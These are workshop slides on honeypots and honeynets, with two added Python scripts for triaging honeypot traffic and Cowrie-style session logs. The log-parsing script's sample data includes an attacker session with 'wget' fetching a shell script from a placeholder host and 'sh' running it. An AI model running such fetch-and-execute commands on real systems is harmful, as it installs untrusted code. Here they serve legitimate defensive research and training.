honeypots & honeynets - wiki.apnictraining.net


Page 1: Honeypots & Honeynets

Network Security Workshop

Issue Date: 30 May 2015

Revision: 2.0-draft

Page 2: Contents

1. Objectives
2. Definition of Honeypot & Honeynets
3. Benefits & Risk consideration
4. Example of Honeypot tools
5. The Honeynet Project

Credits: David Watson (Honeynet Project) for some of the contents of this slide [email protected]

Page 3: Know Your Enemy

(Mission Statement, The Honeynet Project)

These days you may be familiar with the term ‘Threat Intelligence’

To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned

Page 4: Honeypots in a Nutshell

• Resources (vulnerable) deployed to
  – Learn about attacks and attacker methodology
  – Understand how systems are compromised
  – Uncover the attacker’s infrastructure (compromised hosts, networks, C&C servers)
  – Capture relevant artifacts – pcaps, malware samples, etc.
• Could even show vulnerabilities not yet known!
• Lots of open source tools and projects
• Nothing to do with bees or honey ☺

Page 5: The Big Picture

[Diagram: Attacking Host [IP Address], Honeypot, Pastebin]

• Attacking host - bruteforce and gain access
• Downloads malicious script
• Executes malicious script
  – Honeypot won’t execute the script but we have a copy of the malware sample
• What is the malware doing?

Page 6: Honeypots and Honeynets

• A honeypot is an information system resource whose value lies in the unauthorized or illicit use of that resource
• Honeypot systems have no production value, so any activity going to or from a honeypot is likely a probe, attack or compromise
• A honeynet is simply a network of honeypots
• Information gathering and early warning are the primary benefits to most organisations

Page 7: Honeypot and Honeynet Types

• Low-Interaction (LI)
  – Emulates services, applications and OS’s
  – Easier to deploy/maintain, low risk, but only limited information
• High-Interaction (HI)
  – Real services, applications and OS’s
  – Capture extensive information, but higher risk and time intensive to maintain

Page 8: Honeypot and Honeynet Types

• Server Honeypots
  – Listen for incoming network connections
  – Analyse attacks targeting host’s users, services and operating systems
• Client Honeypots
  – Reach out and interact with remote potentially malicious resources
  – Have to be instructed where to go to find evil
  – Analyse attacks targeting clients and users

Page 9: Honeypot and Honeynet Pros / Cons

Pros

• Simple Concept
• Collect small data sets of high value
• Few False Positives
• Catch new attacks
• Low False Negatives
• Can beat encryption
• Minimal hardware
• Real time alerting

Cons

• Potentially complex
• Need data analysis
• Only a microscope
• Detection by attackers
• Risk from compromises
• Legal concerns
• False negatives
• Potentially live 24/7
• Operationally intensive

Page 10: APNIC46

• APNIC46 Network Security Workshop Participants deployed 7 honeypots to a cloud service

Page 11: APNIC46

Page 12: APNIC46

Page 13: What can you learn?

• Hosts that are trying to connect / scan you
  – Potentially already compromised or infected
  – such as IP address
• The payload used after successfully gaining access to the honeypot system
• Scripts, binaries/executables etc.
  – remote control scripts
  – malware samples

Page 14: Why would you want to do this?

• By right, you should not expect any real activity or traffic to/from/in your honeypot
• Detect anomalous activities in your network or system?
  – Infected / Compromised computers
  – Misconfiguration
• Learn about attacks in the wild (research)
  – Especially if you can scale the deployment
  – Attackers and attacker techniques
  – Information Sharing opportunities
  – Improve overall Security
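The early-warning idea on pages 6 and 14 (a honeypot has no production value, so any flow touching it is worth looking at, and an internal source doing so points at a compromised or misconfigured host) can be turned into a simple triage rule. The script below is an added example, not part of the APNIC slides; the flow-record format, the honeypot addresses and the internal ranges are assumptions, and the flow lines are constructed.

```python
"""Early-warning triage for honeypot traffic (added example, not from the slides).

A honeypot should see no legitimate traffic, so the rule is simple: every
source that touches a honeypot address gets an alert, and internal sources get
the higher priority because they suggest an infected or misconfigured host
inside the perimeter. The flow format "timestamp src dst dport proto" is an
assumed generic firewall/netflow export, not any particular product's format.
"""
import ipaddress

# Honeypot addresses (assumption; RFC 5737 documentation ranges used throughout).
HONEYPOTS = {"192.0.2.10", "192.0.2.11"}

# The organisation's internal address space (assumption).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

# Constructed flow records: one external host scanning both honeypots, one
# internal host touching SMB/NetBIOS on a honeypot, one flow to a non-honeypot.
SAMPLE_FLOWS = """\
2015-05-30T08:00:01Z 198.51.100.7 192.0.2.10 22 tcp
2015-05-30T08:00:02Z 198.51.100.7 192.0.2.10 23 tcp
2015-05-30T08:00:03Z 198.51.100.7 192.0.2.11 22 tcp
2015-05-30T08:01:10Z 10.0.5.23 192.0.2.10 445 tcp
2015-05-30T08:01:11Z 10.0.5.23 192.0.2.10 139 tcp
2015-05-30T08:02:00Z 10.0.9.4 198.51.100.99 443 tcp
2015-05-30T08:03:00Z 203.0.113.42 192.0.2.11 80 tcp
"""


def parse_flows(text):
    """Parse the constructed flow format into dicts, skipping malformed lines."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, dport, proto = parts
        try:
            flows.append({"ts": ts, "src": ipaddress.ip_address(src),
                          "dst": dst, "dport": int(dport), "proto": proto})
        except ValueError:
            continue  # unparsable address or port: drop the record, keep going
    return flows


def is_internal(addr):
    return any(addr in net for net in INTERNAL_NETS)


def triage(flows):
    """Return, per source that touched a honeypot, which honeypots and ports it
    reached and whether it is an internal address. Flows to anything other than
    a honeypot are ignored: the honeypot's value is that nothing legitimate
    should ever reach it."""
    hits = {}
    for f in flows:
        if f["dst"] not in HONEYPOTS:
            continue
        src = str(f["src"])
        entry = hits.setdefault(src, {"internal": is_internal(f["src"]),
                                      "honeypots": set(), "ports": set(),
                                      "first_seen": f["ts"]})
        entry["honeypots"].add(f["dst"])
        entry["ports"].add(f["dport"])
    return hits


def alerts(hits):
    """Render triage results as alert lines, internal sources first."""
    out = []
    for src, e in sorted(hits.items(), key=lambda kv: (not kv[1]["internal"], kv[0])):
        sev = "HIGH" if e["internal"] else "INFO"
        kind = "internal host touched honeypot" if e["internal"] else "external probe"
        out.append(f"{sev} {src}: {kind}; honeypots={sorted(e['honeypots'])} "
                   f"ports={sorted(e['ports'])} first_seen={e['first_seen']}")
    return out


if __name__ == "__main__":
    for line in alerts(triage(parse_flows(SAMPLE_FLOWS))):
        print(line)
```

Run on the constructed flows it produces one HIGH alert for 10.0.5.23 and INFO alerts for the two external sources; the flow from 10.0.9.4 to a non-honeypot address is never considered, which is what keeps the false-positive rate of this kind of rule low.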

Page 15: Some Examples

• Dionaea (Malware): http://dionaea.carnivore.it/
• Cowrie - SSH & Telnet honeypot: https://github.com/cowrie/cowrie/
• Kippo - SSH honeypot: https://code.google.com/p/kippo/
• Glastopf – Web Honeypot: http://glastopf.org/
• Ghost – USB Honeypot: https://code.google.com/p/ghost-usb-honeypot/
• Thug – Client Honeypot: https://github.com/buffer/thug

Page 16: APNIC Community Honeynet Project

Page 17: APNIC Community Honeynet Project

• Started in 2015
• Distributed Honeypots*
• Partners mainly in the AP region
• Observe and learn about attacks on the Internet
• Information sharing with APNIC members, CERTs/CSIRTs and Security Community

Page 18: Learn from actual compromise

• Honeypot used – Cowrie
• Emulate login on port 22 (ssh) and port 23 (telnet)
• Present attacker with file system
• Capture commands and allow attacker to download scripts/binaries (payload)
• Demo:
  – https://www.fsck.my/viz/kippo-playlog.php
  – Check out #2 (manual attack) and #19 (automated attack)
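Pages 5, 13 and 18 describe the same chain: a host brute-forces the emulated login, fetches a script, and the honeypot keeps a copy instead of running it. The script below is an added example (not from the APNIC slides and not Cowrie's own code) that walks constructed log lines in the shape of Cowrie's JSON output and extracts what page 13 lists as the lessons: attacking hosts, credentials tried, commands entered, and payload URLs and hashes. The event names (cowrie.session.connect, cowrie.login.failed, cowrie.login.success, cowrie.command.input, cowrie.session.file_download) and field names are assumptions about that log format; the hash and the addresses in the sample are placeholders.

```python
"""Per-session triage of a Cowrie-style JSON log (added example, not Cowrie code).

The honeypot never executes what the attacker downloads; the URL and hash
recorded at download time are the artefacts to hand to malware analysis, and
the source addresses are what gets shared with CERTs/CSIRTs. Event and field
names below are assumed to follow Cowrie's JSON log; adjust if yours differ.
"""
import json

# Constructed log lines: one automated-looking session on port 22 that logs in
# after two failures and fetches a script, one telnet session that never logs
# in, and a corrupt line. Addresses are RFC 5737 ranges; the hash is a placeholder.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","src_port":51234,"dst_port":22,"session":"a1b2","timestamp":"2015-05-30T08:00:01Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","session":"a1b2","timestamp":"2015-05-30T08:00:02Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","session":"a1b2","timestamp":"2015-05-30T08:00:03Z"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","session":"a1b2","timestamp":"2015-05-30T08:00:04Z"}
{"eventid":"cowrie.command.input","input":"uname -a","session":"a1b2","timestamp":"2015-05-30T08:00:05Z"}
{"eventid":"cowrie.command.input","input":"wget http://203.0.113.42/x.sh -O /tmp/x.sh","session":"a1b2","timestamp":"2015-05-30T08:00:06Z"}
{"eventid":"cowrie.session.file_download","url":"http://203.0.113.42/x.sh","outfile":"dl/PLACEHOLDER_SHA256","shasum":"PLACEHOLDER_SHA256","session":"a1b2","timestamp":"2015-05-30T08:00:07Z"}
{"eventid":"cowrie.command.input","input":"sh /tmp/x.sh","session":"a1b2","timestamp":"2015-05-30T08:00:08Z"}
{"eventid":"cowrie.session.closed","session":"a1b2","timestamp":"2015-05-30T08:00:09Z"}
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.9","src_port":40001,"dst_port":23,"session":"c3d4","timestamp":"2015-05-30T08:10:00Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","session":"c3d4","timestamp":"2015-05-30T08:10:01Z"}
not json at all
"""


def parse_events(text):
    """Parse one JSON object per line; corrupt lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(ev, dict) and "eventid" in ev and "session" in ev:
            events.append(ev)
    return events


def summarise_sessions(events):
    """Group events by session id into: source, port, credentials, commands, downloads."""
    sessions = {}
    for ev in events:
        s = sessions.setdefault(ev["session"], {
            "src_ip": None, "dst_port": None, "failed_logins": [],
            "login": None, "commands": [], "downloads": []})
        eid = ev["eventid"]
        if eid == "cowrie.session.connect":
            s["src_ip"] = ev.get("src_ip")
            s["dst_port"] = ev.get("dst_port")
        elif eid == "cowrie.login.failed":
            s["failed_logins"].append((ev.get("username"), ev.get("password")))
        elif eid == "cowrie.login.success":
            s["login"] = (ev.get("username"), ev.get("password"))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            s["downloads"].append({"url": ev.get("url"), "sha256": ev.get("shasum")})
    return sessions


def indicators(sessions):
    """Collect the shareable indicators: attacking IPs, payload URLs and hashes."""
    ind = {"src_ips": set(), "urls": set(), "hashes": set()}
    for s in sessions.values():
        if s["src_ip"]:
            ind["src_ips"].add(s["src_ip"])
        for d in s["downloads"]:
            if d["url"]:
                ind["urls"].add(d["url"])
            if d["sha256"]:
                ind["hashes"].add(d["sha256"])
    return ind


if __name__ == "__main__":
    sessions = summarise_sessions(parse_events(SAMPLE_LOG))
    for sid, s in sessions.items():
        print(sid, s["src_ip"], "port", s["dst_port"], "login:", s["login"],
              "failed:", len(s["failed_logins"]), "cmds:", len(s["commands"]),
              "downloads:", [d["url"] for d in s["downloads"]])
    print(indicators(sessions))
```

The per-session view is what the demo playlog on this page shows interactively: the failed credentials and the command sequence distinguish a manual session from an automated one, and the download record is the evidence that the payload was captured rather than executed.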

Page 19: APNIC Community HP

Page 20: Sensor locations

• Tonga
• Samoa
• Malaysia
• Bhutan
• Bangladesh
• Japan
• Australia

Page 21: Conclusion

• Honeypots are useful for learning about attacks (early warning or research)
• APNIC Community Project
  – Looking for partners to deploy honeypots
  – Collaboration

Contact: [email protected]